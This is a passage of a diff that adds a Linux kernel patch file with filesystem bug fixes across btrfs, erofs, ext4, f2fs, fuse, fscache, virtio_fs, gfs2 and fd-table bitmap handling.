++	BTRFS_I(inode)->root = root;
+ 
+ 	/*
+ 	 * Passing NULL as we don't have fs_info but tracepoints are not used
+@@ -316,6 +334,8 @@ static int test_find_delalloc(u32 sectorsize)
+ 	process_page_range(inode, 0, total_dirty - 1,
+ 			   PROCESS_UNLOCK | PROCESS_RELEASE);
+ 	iput(inode);
++	btrfs_free_dummy_root(root);
++	btrfs_free_dummy_fs_info(fs_info);
+ 	return ret;
+ }
+ 
+@@ -598,7 +618,7 @@ int btrfs_test_extent_io(u32 sectorsize, u32 nodesize)
+ 
+ 	test_msg("running extent I/O tests");
+ 
+-	ret = test_find_delalloc(sectorsize);
++	ret = test_find_delalloc(sectorsize, nodesize);
+ 	if (ret)
+ 		goto out;
+ 
+diff --git a/fs/btrfs/tree-checker.c b/fs/btrfs/tree-checker.c
+index 02e8398246ae5..28f5df3b70c8a 100644
+--- a/fs/btrfs/tree-checker.c
++++ b/fs/btrfs/tree-checker.c
+@@ -1613,6 +1613,72 @@ static int check_inode_ref(struct extent_buffer *leaf,
+ 	return 0;
+ }
+ 
++static int check_dev_extent_item(const struct extent_buffer *leaf,
++				 const struct btrfs_key *key,
++				 int slot,
++				 struct btrfs_key *prev_key)
++{
++	struct btrfs_dev_extent *de;
++	const u32 sectorsize = leaf->fs_info->sectorsize;
++
++	de = btrfs_item_ptr(leaf, slot, struct btrfs_dev_extent);
++	/* Basic fixed member checks. */
++	if (unlikely(btrfs_dev_extent_chunk_tree(leaf, de) !=
++		     BTRFS_CHUNK_TREE_OBJECTID)) {
++		generic_err(leaf, slot,
++			    "invalid dev extent chunk tree id, has %llu expect %llu",
++			    btrfs_dev_extent_chunk_tree(leaf, de),
++			    BTRFS_CHUNK_TREE_OBJECTID);
++		return -EUCLEAN;
++	}
++	if (unlikely(btrfs_dev_extent_chunk_objectid(leaf, de) !=
++		     BTRFS_FIRST_CHUNK_TREE_OBJECTID)) {
++		generic_err(leaf, slot,
++			    "invalid dev extent chunk objectid, has %llu expect %llu",
++			    btrfs_dev_extent_chunk_objectid(leaf, de),
++			    BTRFS_FIRST_CHUNK_TREE_OBJECTID);
++		return -EUCLEAN;
++	}
++	/* Alignment check. */
++	if (unlikely(!IS_ALIGNED(key->offset, sectorsize))) {
++		generic_err(leaf, slot,
++			    "invalid dev extent key.offset, has %llu not aligned to %u",
++			    key->offset, sectorsize);
++		return -EUCLEAN;
++	}
++	if (unlikely(!IS_ALIGNED(btrfs_dev_extent_chunk_offset(leaf, de),
++				 sectorsize))) {
++		generic_err(leaf, slot,
++			    "invalid dev extent chunk offset, has %llu not aligned to %u",
++			    btrfs_dev_extent_chunk_offset(leaf, de),
++			    sectorsize);
++		return -EUCLEAN;
++	}
++	if (unlikely(!IS_ALIGNED(btrfs_dev_extent_length(leaf, de),
++				 sectorsize))) {
++		generic_err(leaf, slot,
++			    "invalid dev extent length, has %llu not aligned to %u",
++			    btrfs_dev_extent_length(leaf, de), sectorsize);
++		return -EUCLEAN;
++	}
++	/* Overlap check with previous dev extent. */
++	if (slot && prev_key->objectid == key->objectid &&
++	    prev_key->type == key->type) {
++		struct btrfs_dev_extent *prev_de;
++		u64 prev_len;
++
++		prev_de = btrfs_item_ptr(leaf, slot - 1, struct btrfs_dev_extent);
++		prev_len = btrfs_dev_extent_length(leaf, prev_de);
++		if (unlikely(prev_key->offset + prev_len > key->offset)) {
++			generic_err(leaf, slot,
++		"dev extent overlap, prev offset %llu len %llu current offset %llu",
++				    prev_key->offset, prev_len, key->offset);
++			return -EUCLEAN;
++		}
++	}
++	return 0;
++}
++
+ /*
+  * Common point to switch the item-specific validation.
+  */
+@@ -1648,6 +1714,9 @@ static int check_leaf_item(struct extent_buffer *leaf,
+ 	case BTRFS_DEV_ITEM_KEY:
+ 		ret = check_dev_item(leaf, key, slot);
+ 		break;
++	case BTRFS_DEV_EXTENT_KEY:
++		ret = check_dev_extent_item(leaf, key, slot, prev_key);
++		break;
+ 	case BTRFS_INODE_ITEM_KEY:
+ 		ret = check_inode_item(leaf, key, slot);
+ 		break;
+diff --git a/fs/erofs/decompressor.c b/fs/erofs/decompressor.c
+index 1eefa4411e066..708bf142b1888 100644
+--- a/fs/erofs/decompressor.c
++++ b/fs/erofs/decompressor.c
+@@ -248,15 +248,9 @@ static int z_erofs_lz4_decompress_mem(struct z_erofs_lz4_decompress_ctx *ctx,
+ 	if (ret != rq->outputsize) {
+ 		erofs_err(rq->sb, "failed to decompress %d in[%u, %u] out[%u]",
+ 			  ret, rq->inputsize, inputmargin, rq->outputsize);
+-
+-		print_hex_dump(KERN_DEBUG, "[ in]: ", DUMP_PREFIX_OFFSET,
+-			       16, 1, src + inputmargin, rq->inputsize, true);
+-		print_hex_dump(KERN_DEBUG, "[out]: ", DUMP_PREFIX_OFFSET,
+-			       16, 1, out, rq->outputsize, true);
+-
+ 		if (ret >= 0)
+ 			memset(out + ret, 0, rq->outputsize - ret);
+-		ret = -EIO;
++		ret = -EFSCORRUPTED;
+ 	} else {
+ 		ret = 0;
+ 	}
+diff --git a/fs/ext4/extents.c b/fs/ext4/extents.c
+index 5cbe5ae5ad4a2..92b540754799c 100644
+--- a/fs/ext4/extents.c
++++ b/fs/ext4/extents.c
+@@ -3404,9 +3404,10 @@ static int ext4_ext_convert_to_initialized(handle_t *handle,
+ 	struct ext4_extent *ex, *abut_ex;
+ 	ext4_lblk_t ee_block, eof_block;
+ 	unsigned int ee_len, depth, map_len = map->m_len;
+-	int allocated = 0, max_zeroout = 0;
+ 	int err = 0;
+ 	int split_flag = EXT4_EXT_DATA_VALID2;
++	int allocated = 0;
++	unsigned int max_zeroout = 0;
+ 
+ 	ext_debug(inode, "logical block %llu, max_blocks %u\n",
+ 		  (unsigned long long)map->m_lblk, map_len);
+diff --git a/fs/ext4/mballoc.c b/fs/ext4/mballoc.c
+index 004ad321a45d6..c723ee3e49959 100644
+--- a/fs/ext4/mballoc.c
++++ b/fs/ext4/mballoc.c
+@@ -6483,6 +6483,9 @@ __releases(ext4_group_lock_ptr(sb, e4b->bd_group))
+ 	bool set_trimmed = false;
+ 	void *bitmap;
+ 
++	if (unlikely(EXT4_MB_GRP_BBITMAP_CORRUPT(e4b->bd_info)))
++		return 0;
++
+ 	last = ext4_last_grp_cluster(sb, e4b->bd_group);
+ 	bitmap = e4b->bd_bitmap;
+ 	if (start == 0 && max >= last)
+diff --git a/fs/ext4/super.c b/fs/ext4/super.c
+index 274542d869d0c..3db39758486e9 100644
+--- a/fs/ext4/super.c
++++ b/fs/ext4/super.c
+@@ -5752,6 +5752,28 @@ static struct inode *ext4_get_journal_inode(struct super_block *sb,
+ 	return journal_inode;
+ }
+ 
++static int ext4_journal_bmap(journal_t *journal, sector_t *block)
++{
++	struct ext4_map_blocks map;
++	int ret;
++
++	if (journal->j_inode == NULL)
++		return 0;
++
++	map.m_lblk = *block;
++	map.m_len = 1;
++	ret = ext4_map_blocks(NULL, journal->j_inode, &map, 0);
++	if (ret <= 0) {
++		ext4_msg(journal->j_inode->i_sb, KERN_CRIT,
++			 "journal bmap failed: block %llu ret %d\n",
++			 *block, ret);
++		jbd2_journal_abort(journal, ret ? ret : -EIO);
++		return ret;
++	}
++	*block = map.m_pblk;
++	return 0;
++}
++
+ static journal_t *ext4_get_journal(struct super_block *sb,
+ 				   unsigned int journal_inum)
+ {
+@@ -5772,6 +5794,7 @@ static journal_t *ext4_get_journal(struct super_block *sb,
+ 		return NULL;
+ 	}
+ 	journal->j_private = sb;
++	journal->j_bmap = ext4_journal_bmap;
+ 	ext4_init_journal_params(sb, journal);
+ 	return journal;
+ }
+diff --git a/fs/ext4/xattr.c b/fs/ext4/xattr.c
+index f0a45d3ec4ebb..d94b1a6c60e27 100644
+--- a/fs/ext4/xattr.c
++++ b/fs/ext4/xattr.c
+@@ -1522,45 +1522,49 @@ ext4_xattr_inode_cache_find(struct inode *inode, const void *value,
+ /*
+  * Add value of the EA in an inode.
+  */
+-static int ext4_xattr_inode_lookup_create(handle_t *handle, struct inode *inode,
+-					  const void *value, size_t value_len,
+-					  struct inode **ret_inode)
++static struct inode *ext4_xattr_inode_lookup_create(handle_t *handle,
++		struct inode *inode, const void *value, size_t value_len)
+ {
+ 	struct inode *ea_inode;
+ 	u32 hash;
+ 	int err;
+ 
++	/* Account inode & space to quota even if sharing... */
++	err = ext4_xattr_inode_alloc_quota(inode, value_len);
++	if (err)
++		return ERR_PTR(err);
++
+ 	hash = ext4_xattr_inode_hash(EXT4_SB(inode->i_sb), value, value_len);
+ 	ea_inode = ext4_xattr_inode_cache_find(inode, value, value_len, hash);
+ 	if (ea_inode) {
+ 		err = ext4_xattr_inode_inc_ref(handle, ea_inode);
+-		if (err) {
+-			iput(ea_inode);
+-			return err;
+-		}
+-
+-		*ret_inode = ea_inode;
+-		return 0;
++		if (err)
++			goto out_err;
++		return ea_inode;
+ 	}
+ 
+ 	/* Create an inode for the EA value */
+ 	ea_inode = ext4_xattr_inode_create(handle, inode, hash);
+-	if (IS_ERR(ea_inode))
+-		return PTR_ERR(ea_inode);
++	if (IS_ERR(ea_inode)) {
++		ext4_xattr_inode_free_quota(inode, NULL, value_len);
++		return ea_inode;
++	}
+ 
+ 	err = ext4_xattr_inode_write(handle, ea_inode, value, value_len);
+ 	if (err) {
+-		ext4_xattr_inode_dec_ref(handle, ea_inode);
+-		iput(ea_inode);
+-		return err;
++		if (ext4_xattr_inode_dec_ref(handle, ea_inode))
++			ext4_warning_inode(ea_inode, "cleanup dec ref error %d", err);
++		goto out_err;
+ 	}
+ 
+ 	if (EA_INODE_CACHE(inode))
+ 		mb_cache_entry_create(EA_INODE_CACHE(inode), GFP_NOFS, hash,
+ 				      ea_inode->i_ino, true /* reusable */);
+-
+-	*ret_inode = ea_inode;
+-	return 0;
++	return ea_inode;
++out_err:
++	iput(ea_inode);
++	ext4_xattr_inode_free_quota(inode, NULL, value_len);
++	return ERR_PTR(err);
+ }
+ 
+ /*
+@@ -1572,6 +1576,7 @@ static int ext4_xattr_inode_lookup_create(handle_t *handle, struct inode *inode,
+ static int ext4_xattr_set_entry(struct ext4_xattr_info *i,
+ 				struct ext4_xattr_search *s,
+ 				handle_t *handle, struct inode *inode,
++				struct inode *new_ea_inode,
+ 				bool is_block)
+ {
+ 	struct ext4_xattr_entry *last, *next;
+@@ -1579,7 +1584,6 @@ static int ext4_xattr_set_entry(struct ext4_xattr_info *i,
+ 	size_t min_offs = s->end - s->base, name_len = strlen(i->name);
+ 	int in_inode = i->in_inode;
+ 	struct inode *old_ea_inode = NULL;
+-	struct inode *new_ea_inode = NULL;
+ 	size_t old_size, new_size;
+ 	int ret;
+ 
+@@ -1664,43 +1668,11 @@ static int ext4_xattr_set_entry(struct ext4_xattr_info *i,
+ 			old_ea_inode = NULL;
+ 			goto out;
+ 		}
+-	}
+-	if (i->value && in_inode) {
+-		WARN_ON_ONCE(!i->value_len);
+-
+-		ret = ext4_xattr_inode_alloc_quota(inode, i->value_len);
+-		if (ret)
+-			goto out;
+-
+-		ret = ext4_xattr_inode_lookup_create(handle, inode, i->value,
+-						     i->value_len,
+-						     &new_ea_inode);
+-		if (ret) {
+-			new_ea_inode = NULL;
+-			ext4_xattr_inode_free_quota(inode, NULL, i->value_len);
+-			goto out;
+-		}
+-	}
+ 
+-	if (old_ea_inode) {
+ 		/* We are ready to release ref count on the old_ea_inode. */
+ 		ret = ext4_xattr_inode_dec_ref(handle, old_ea_inode);
+-		if (ret) {
+-			/* Release newly required ref count on new_ea_inode. */
+-			if (new_ea_inode) {
+-				int err;
+-
+-				err = ext4_xattr_inode_dec_ref(handle,
+-							       new_ea_inode);
+-				if (err)
+-					ext4_warning_inode(new_ea_inode,
+-						  "dec ref new_ea_inode err=%d",
+-						  err);
+-				ext4_xattr_inode_free_quota(inode, new_ea_inode,
+-							    i->value_len);
+-			}
++		if (ret)
+ 			goto out;
+-		}
+ 
+ 		ext4_xattr_inode_free_quota(inode, old_ea_inode,
+ 					    le32_to_cpu(here->e_value_size));
+@@ -1824,7 +1796,6 @@ static int ext4_xattr_set_entry(struct ext4_xattr_info *i,
+ 	ret = 0;
+ out:
+ 	iput(old_ea_inode);
+-	iput(new_ea_inode);
+ 	return ret;
+ }
+ 
+@@ -1887,9 +1858,21 @@ ext4_xattr_block_set(handle_t *handle, struct inode *inode,
+ 	size_t old_ea_inode_quota = 0;
+ 	unsigned int ea_ino;
+ 
+-
+ #define header(x) ((struct ext4_xattr_header *)(x))
+ 
++	/* If we need EA inode, prepare it before locking the buffer */
++	if (i->value && i->in_inode) {
++		WARN_ON_ONCE(!i->value_len);
++
++		ea_inode = ext4_xattr_inode_lookup_create(handle, inode,
++					i->value, i->value_len);
++		if (IS_ERR(ea_inode)) {
++			error = PTR_ERR(ea_inode);
++			ea_inode = NULL;
++			goto cleanup;
++		}
++	}
++
+ 	if (s->base) {
+ 		int offset = (char *)s->here - bs->bh->b_data;
+ 
+@@ -1898,6 +1881,7 @@ ext4_xattr_block_set(handle_t *handle, struct inode *inode,
+ 						      EXT4_JTR_NONE);
+ 		if (error)
+ 			goto cleanup;
++
+ 		lock_buffer(bs->bh);
+ 
+ 		if (header(s->base)->h_refcount == cpu_to_le32(1)) {
+@@ -1924,7 +1908,7 @@ ext4_xattr_block_set(handle_t *handle, struct inode *inode,
+ 			}
+ 			ea_bdebug(bs->bh, "modifying in-place");
+ 			error = ext4_xattr_set_entry(i, s, handle, inode,
+-						     true /* is_block */);
++					     ea_inode, true /* is_block */);
+ 			ext4_xattr_block_csum_set(inode, bs->bh);
+ 			unlock_buffer(bs->bh);
+ 			if (error == -EFSCORRUPTED)
+@@ -1992,29 +1976,13 @@ ext4_xattr_block_set(handle_t *handle, struct inode *inode,
+ 		s->end = s->base + sb->s_blocksize;
+ 	}
+ 
+-	error = ext4_xattr_set_entry(i, s, handle, inode, true /* is_block */);
++	error = ext4_xattr_set_entry(i, s, handle, inode, ea_inode,
++				     true /* is_block */);
+ 	if (error == -EFSCORRUPTED)
+ 		goto bad_block;
+ 	if (error)
+ 		goto cleanup;
+ 
+-	if (i->value && s->here->e_value_inum) {
+-		/*
+-		 * A ref count on ea_inode has been taken as part of the call to
+-		 * ext4_xattr_set_entry() above. We would like to drop this
+-		 * extra ref but we have to wait until the xattr block is
+-		 * initialized and has its own ref count on the ea_inode.
+-		 */
+-		ea_ino = le32_to_cpu(s->here->e_value_inum);
+-		error = ext4_xattr_inode_iget(inode, ea_ino,
+-					      le32_to_cpu(s->here->e_hash),
+-					      &ea_inode);
+-		if (error) {
+-			ea_inode = NULL;
+-			goto cleanup;
+-		}
+-	}
+-
+ inserted:
+ 	if (!IS_LAST_ENTRY(s->first)) {
+ 		new_bh = ext4_xattr_block_cache_find(inode, header(s->base),
+@@ -2167,17 +2135,16 @@ ext4_xattr_block_set(handle_t *handle, struct inode *inode,
+ 
+ cleanup:
+ 	if (ea_inode) {
+-		int error2;
+-
+-		error2 = ext4_xattr_inode_dec_ref(handle, ea_inode);
+-		if (error2)
+-			ext4_warning_inode(ea_inode, "dec ref error=%d",
+-					   error2);
++		if (error) {
++			int error2;
+ 
+-		/* If there was an error, revert the quota charge. */
+-		if (error)
++			error2 = ext4_xattr_inode_dec_ref(handle, ea_inode);
++			if (error2)
++				ext4_warning_inode(ea_inode, "dec ref error=%d",
++						   error2);
+ 			ext4_xattr_inode_free_quota(inode, ea_inode,
+ 						    i_size_read(ea_inode));
++		}
+ 		iput(ea_inode);
+ 	}
+ 	if (ce)
+@@ -2235,14 +2202,38 @@ int ext4_xattr_ibody_set(handle_t *handle, struct inode *inode,
+ {
+ 	struct ext4_xattr_ibody_header *header;
+ 	struct ext4_xattr_search *s = &is->s;
++	struct inode *ea_inode = NULL;
+ 	int error;
+ 
+ 	if (!EXT4_INODE_HAS_XATTR_SPACE(inode))
+ 		return -ENOSPC;
+ 
+-	error = ext4_xattr_set_entry(i, s, handle, inode, false /* is_block */);
+-	if (error)
++	/* If we need EA inode, prepare it before locking the buffer */
++	if (i->value && i->in_inode) {
++		WARN_ON_ONCE(!i->value_len);
++
++		ea_inode = ext4_xattr_inode_lookup_create(handle, inode,
++					i->value, i->value_len);
++		if (IS_ERR(ea_inode))
++			return PTR_ERR(ea_inode);
++	}
++	error = ext4_xattr_set_entry(i, s, handle, inode, ea_inode,
++				     false /* is_block */);
++	if (error) {
++		if (ea_inode) {
++			int error2;
++
++			error2 = ext4_xattr_inode_dec_ref(handle, ea_inode);
++			if (error2)
++				ext4_warning_inode(ea_inode, "dec ref error=%d",
++						   error2);
++
++			ext4_xattr_inode_free_quota(inode, ea_inode,
++						    i_size_read(ea_inode));
++			iput(ea_inode);
++		}
+ 		return error;
++	}
+ 	header = IHDR(inode, ext4_raw_inode(&is->iloc));
+ 	if (!IS_LAST_ENTRY(s->first)) {
+ 		header->h_magic = cpu_to_le32(EXT4_XATTR_MAGIC);
+@@ -2251,6 +2242,7 @@ int ext4_xattr_ibody_set(handle_t *handle, struct inode *inode,
+ 		header->h_magic = cpu_to_le32(0);
+ 		ext4_clear_inode_state(inode, EXT4_STATE_XATTR);
+ 	}
++	iput(ea_inode);
+ 	return 0;
+ }
+ 
+diff --git a/fs/f2fs/segment.c b/fs/f2fs/segment.c
+index 1264a350d4d75..947849e66b0a7 100644
+--- a/fs/f2fs/segment.c
++++ b/fs/f2fs/segment.c
+@@ -2191,6 +2191,8 @@ static void update_sit_entry(struct f2fs_sb_info *sbi, block_t blkaddr, int del)
+ #endif
+ 
+ 	segno = GET_SEGNO(sbi, blkaddr);
++	if (segno == NULL_SEGNO)
++		return;
+ 
+ 	se = get_seg_entry(sbi, segno);
+ 	new_vblocks = se->valid_blocks + del;
+@@ -3286,8 +3288,7 @@ void f2fs_allocate_data_block(struct f2fs_sb_info *sbi, struct page *page,
+ 	 * since SSR needs latest valid block information.
+ 	 */
+ 	update_sit_entry(sbi, *new_blkaddr, 1);
+-	if (GET_SEGNO(sbi, old_blkaddr) != NULL_SEGNO)
+-		update_sit_entry(sbi, old_blkaddr, -1);
++	update_sit_entry(sbi, old_blkaddr, -1);
+ 
+ 	if (!__has_curseg_space(sbi, curseg)) {
+ 		if (from_gc)
+diff --git a/fs/file.c b/fs/file.c
+index 82c5d23820820..50a019fd1726a 100644
+--- a/fs/file.c
++++ b/fs/file.c
+@@ -46,27 +46,23 @@ static void free_fdtable_rcu(struct rcu_head *rcu)
+ #define BITBIT_NR(nr)	BITS_TO_LONGS(BITS_TO_LONGS(nr))
+ #define BITBIT_SIZE(nr)	(BITBIT_NR(nr) * sizeof(long))
+ 
++#define fdt_words(fdt) ((fdt)->max_fds / BITS_PER_LONG) // words in ->open_fds
+ /*
+  * Copy 'count' fd bits from the old table to the new table and clear the extra
+  * space if any.  This does not copy the file pointers.  Called with the files
+  * spinlock held for write.
+  */
+-static void copy_fd_bitmaps(struct fdtable *nfdt, struct fdtable *ofdt,
+-			    unsigned int count)
++static inline void copy_fd_bitmaps(struct fdtable *nfdt, struct fdtable *ofdt,
++			    unsigned int copy_words)
+ {
+-	unsigned int cpy, set;
+-
+-	cpy = count / BITS_PER_BYTE;
+-	set = (nfdt->max_fds - count) / BITS_PER_BYTE;
+-	memcpy(nfdt->open_fds, ofdt->open_fds, cpy);
+-	memset((char *)nfdt->open_fds + cpy, 0, set);
+-	memcpy(nfdt->close_on_exec, ofdt->close_on_exec, cpy);
+-	memset((char *)nfdt->close_on_exec + cpy, 0, set);
+-
+-	cpy = BITBIT_SIZE(count);
+-	set = BITBIT_SIZE(nfdt->max_fds) - cpy;
+-	memcpy(nfdt->full_fds_bits, ofdt->full_fds_bits, cpy);
+-	memset((char *)nfdt->full_fds_bits + cpy, 0, set);
++	unsigned int nwords = fdt_words(nfdt);
++
++	bitmap_copy_and_extend(nfdt->open_fds, ofdt->open_fds,
++			copy_words * BITS_PER_LONG, nwords * BITS_PER_LONG);
++	bitmap_copy_and_extend(nfdt->close_on_exec, ofdt->close_on_exec,
++			copy_words * BITS_PER_LONG, nwords * BITS_PER_LONG);
++	bitmap_copy_and_extend(nfdt->full_fds_bits, ofdt->full_fds_bits,
++			copy_words, nwords);
+ }
+ 
+ /*
+@@ -84,7 +80,7 @@ static void copy_fdtable(struct fdtable *nfdt, struct fdtable *ofdt)
+ 	memcpy(nfdt->fd, ofdt->fd, cpy);
+ 	memset((char *)nfdt->fd + cpy, 0, set);
+ 
+-	copy_fd_bitmaps(nfdt, ofdt, ofdt->max_fds);
++	copy_fd_bitmaps(nfdt, ofdt, fdt_words(ofdt));
+ }
+ 
+ /*
+@@ -374,7 +370,7 @@ struct files_struct *dup_fd(struct files_struct *oldf, unsigned int max_fds, int
+ 		open_files = sane_fdtable_size(old_fdt, max_fds);
+ 	}
+ 
+-	copy_fd_bitmaps(new_fdt, old_fdt, open_files);
++	copy_fd_bitmaps(new_fdt, old_fdt, open_files / BITS_PER_LONG);
+ 
+ 	old_fds = old_fdt->fd;
+ 	new_fds = new_fdt->fd;
+diff --git a/fs/fscache/cookie.c b/fs/fscache/cookie.c
+index bce2492186d0b..d4d4b3a8b1060 100644
+--- a/fs/fscache/cookie.c
++++ b/fs/fscache/cookie.c
+@@ -741,6 +741,10 @@ static void fscache_cookie_state_machine(struct fscache_cookie *cookie)
+ 			spin_lock(&cookie->lock);
+ 		}
+ 		if (test_bit(FSCACHE_COOKIE_DO_LRU_DISCARD, &cookie->flags)) {
++			if (atomic_read(&cookie->n_accesses) != 0)
++				/* still being accessed: postpone it */
++				break;
++
+ 			__fscache_set_cookie_state(cookie,
+ 						   FSCACHE_COOKIE_STATE_LRU_DISCARDING);
+ 			wake = true;
+diff --git a/fs/fuse/cuse.c b/fs/fuse/cuse.c
+index c7d882a9fe339..295344a462e1d 100644
+--- a/fs/fuse/cuse.c
++++ b/fs/fuse/cuse.c
+@@ -474,8 +474,7 @@ static int cuse_send_init(struct cuse_conn *cc)
+ 
+ static void cuse_fc_release(struct fuse_conn *fc)
+ {
+-	struct cuse_conn *cc = fc_to_cc(fc);
+-	kfree_rcu(cc, fc.rcu);
++	kfree(fc_to_cc(fc));
+ }
+ 
+ /**
+diff --git a/fs/fuse/dev.c b/fs/fuse/dev.c
+index b4a6e0a1b945a..96a717f73ce37 100644
+--- a/fs/fuse/dev.c
++++ b/fs/fuse/dev.c
+@@ -1615,9 +1615,11 @@ static int fuse_notify_store(struct fuse_conn *fc, unsigned int size,
+ 
+ 		this_num = min_t(unsigned, num, PAGE_SIZE - offset);
+ 		err = fuse_copy_page(cs, &page, offset, this_num, 0);
+-		if (!err && offset == 0 &&
+-		    (this_num == PAGE_SIZE || file_size == end))
++		if (!PageUptodate(page) && !err && offset == 0 &&
++		    (this_num == PAGE_SIZE || file_size == end)) {
++			zero_user_segment(page, this_num, PAGE_SIZE);
+ 			SetPageUptodate(page);
++		}
+ 		unlock_page(page);
+ 		put_page(page);
+ 
+diff --git a/fs/fuse/fuse_i.h b/fs/fuse/fuse_i.h
+index 253b9b78d6f13..66c2a99994683 100644
+--- a/fs/fuse/fuse_i.h
++++ b/fs/fuse/fuse_i.h
+@@ -872,6 +872,7 @@ struct fuse_mount {
+ 
+ 	/* Entry on fc->mounts */
+ 	struct list_head fc_entry;
++	struct rcu_head rcu;
+ };
+ 
+ static inline struct fuse_mount *get_fuse_mount_super(struct super_block *sb)
+diff --git a/fs/fuse/inode.c b/fs/fuse/inode.c
+index f19bdd7cbd779..64618548835b4 100644
+--- a/fs/fuse/inode.c
++++ b/fs/fuse/inode.c
+@@ -925,6 +925,14 @@ void fuse_conn_init(struct fuse_conn *fc, struct fuse_mount *fm,
+ }
+ EXPORT_SYMBOL_GPL(fuse_conn_init);
+ 
++static void delayed_release(struct rcu_head *p)
++{
++	struct fuse_conn *fc = container_of(p, struct fuse_conn, rcu);
++
++	put_user_ns(fc->user_ns);
++	fc->release(fc);
++}
++
+ void fuse_conn_put(struct fuse_conn *fc)
+ {
+ 	if (refcount_dec_and_test(&fc->count)) {
+@@ -936,13 +944,12 @@ void fuse_conn_put(struct fuse_conn *fc)
+ 		if (fiq->ops->release)
+ 			fiq->ops->release(fiq);
+ 		put_pid_ns(fc->pid_ns);
+-		put_user_ns(fc->user_ns);
+ 		bucket = rcu_dereference_protected(fc->curr_bucket, 1);
+ 		if (bucket) {
+ 			WARN_ON(atomic_read(&bucket->count) != 1);
+ 			kfree(bucket);
+ 		}
+-		fc->release(fc);
++		call_rcu(&fc->rcu, delayed_release);
+ 	}
+ }
+ EXPORT_SYMBOL_GPL(fuse_conn_put);
+@@ -1356,7 +1363,7 @@ EXPORT_SYMBOL_GPL(fuse_send_init);
+ void fuse_free_conn(struct fuse_conn *fc)
+ {
+ 	WARN_ON(!list_empty(&fc->devices));
+-	kfree_rcu(fc, rcu);
++	kfree(fc);
+ }
+ EXPORT_SYMBOL_GPL(fuse_free_conn);
+ 
+@@ -1895,7 +1902,7 @@ static void fuse_sb_destroy(struct super_block *sb)
+ void fuse_mount_destroy(struct fuse_mount *fm)
+ {
+ 	fuse_conn_put(fm->fc);
+-	kfree(fm);
++	kfree_rcu(fm, rcu);
+ }
+ EXPORT_SYMBOL(fuse_mount_destroy);
+ 
+diff --git a/fs/fuse/virtio_fs.c b/fs/fuse/virtio_fs.c
+index 4d8d4f16c727b..92d41269f1d35 100644
+--- a/fs/fuse/virtio_fs.c
++++ b/fs/fuse/virtio_fs.c
+@@ -323,6 +323,16 @@ static int virtio_fs_read_tag(struct virtio_device *vdev, struct virtio_fs *fs)
+ 		return -ENOMEM;
+ 	memcpy(fs->tag, tag_buf, len);
+ 	fs->tag[len] = '\0';
++
++	/* While the VIRTIO specification allows any character, newlines are
++	 * awkward on mount(8) command-lines and cause problems in the sysfs
++	 * "tag" attr and uevent TAG= properties. Forbid them.
++	 */
++	if (strchr(fs->tag, '\n')) {
++		dev_dbg(&vdev->dev, "refusing virtiofs tag with newline character\n");
++		return -EINVAL;
++	}
++
+ 	return 0;
+ }
+ 
+diff --git a/fs/gfs2/glock.c b/fs/gfs2/glock.c
+index 95353982e643a..6ba8460f53318 100644
+--- a/fs/gfs2/glock.c
++++ b/fs/gfs2/glock.c
+@@ -146,8 +146,8 @@ static void gfs2_glock_dealloc(struct rcu_head *rcu)
+  *
+  * We need to allow some glocks to be enqueued, dequeued, promoted, and demoted
+  * when we're withdrawn. For example, to maintain metadata integrity, we should
+- * disallow the use of inode and rgrp glocks when withdrawn. Other glocks, like
+- * iopen or the transaction glocks may be safely used because none of their
++ * disallow the use of inode and rgrp glocks when withdrawn. Other glocks like
++ * the iopen or freeze glock may be safely used because none of their
+  * metadata goes through the journal. So in general, we should disallow all
+  * glocks that are journaled, and allow all the others. One exception is:
+  * we need to allow our active journal to be promoted and demoted so others
+@@ -661,8 +661,7 @@ static void finish_xmote(struct gfs2_glock *gl, unsigned int ret)
+ 		if (gh && !test_bit(GLF_DEMOTE_IN_PROGRESS, &gl->gl_flags)) {
+ 			/* move to back of queue and try next entry */
+ 			if (ret & LM_OUT_CANCELED) {
+-				if ((gh->gh_flags & LM_FLAG_PRIORITY) == 0)
+-					list_move_tail(&gh->gh_list, &gl->gl_holders);
++				list_move_tail(&gh->gh_list, &gl->gl_holders);
+ 				gh = find_first_waiter(gl);
+ 				gl->gl_target = gh->gh_state;
+ 				goto retry;
+@@ -749,8 +748,7 @@ __acquires(&gl->gl_lockref.lock)
+ 	    gh && !(gh->gh_flags & LM_FLAG_NOEXP))
+ 		goto skip_inval;
+ 
+-	lck_flags &= (LM_FLAG_TRY | LM_FLAG_TRY_1CB | LM_FLAG_NOEXP |
+-		      LM_FLAG_PRIORITY);
++	lck_flags &= (LM_FLAG_TRY | LM_FLAG_TRY_1CB | LM_FLAG_NOEXP);
+ 	GLOCK_BUG_ON(gl, gl->gl_state == target);
+ 	GLOCK_BUG_ON(gl, gl->gl_state == gl->gl_target);
+ 	if ((target == LM_ST_UNLOCKED || target == LM_ST_DEFERRED) &&
+@@ -1528,27 +1526,20 @@ __acquires(&gl->gl_lockref.lock)
+ 		}
+ 		if (test_bit(HIF_HOLDER, &gh2->gh_iflags))
+ 			continue;
+-		if (unlikely((gh->gh_flags & LM_FLAG_PRIORITY) && !insert_pt))
+-			insert_pt = &gh2->gh_list;
+ 	}
+ 	trace_gfs2_glock_queue(gh, 1);
+ 	gfs2_glstats_inc(gl, GFS2_LKS_QCOUNT);
+ 	gfs2_sbstats_inc(gl, GFS2_LKS_QCOUNT);
+ 	if (likely(insert_pt == NULL)) {
+ 		list_add_tail(&gh->gh_list, &gl->gl_holders);
+-		if (unlikely(gh->gh_flags & LM_FLAG_PRIORITY))
+-			goto do_cancel;
+ 		return;
+ 	}
+ 	list_add_tail(&gh->gh_list, insert_pt);
+-do_cancel:
+ 	gh = list_first_entry(&gl->gl_holders, struct gfs2_holder, gh_list);
+-	if (!(gh->gh_flags & LM_FLAG_PRIORITY)) {
+-		spin_unlock(&gl->gl_lockref.lock);
+-		if (sdp->sd_lockstruct.ls_ops->lm_cancel)
+-			sdp->sd_lockstruct.ls_ops->lm_cancel(gl);
+-		spin_lock(&gl->gl_lockref.lock);
+-	}
++	spin_unlock(&gl->gl_lockref.lock);
++	if (sdp->sd_lockstruct.ls_ops->lm_cancel)
++		sdp->sd_lockstruct.ls_ops->lm_cancel(gl);
++	spin_lock(&gl->gl_lockref.lock);
+ 	return;
+ 
+ trap_recursive:
+@@ -2296,8 +2287,6 @@ static const char *hflags2str(char *buf, u16 flags, unsigned long iflags)
+ 		*p++ = 'e';
+ 	if (flags & LM_FLAG_ANY)
+ 		*p++ = 'A';
+-	if (flags & LM_FLAG_PRIORITY)
+-		*p++ = 'p';
+ 	if (flags & LM_FLAG_NODE_SCOPE)
+ 		*p++ = 'n';
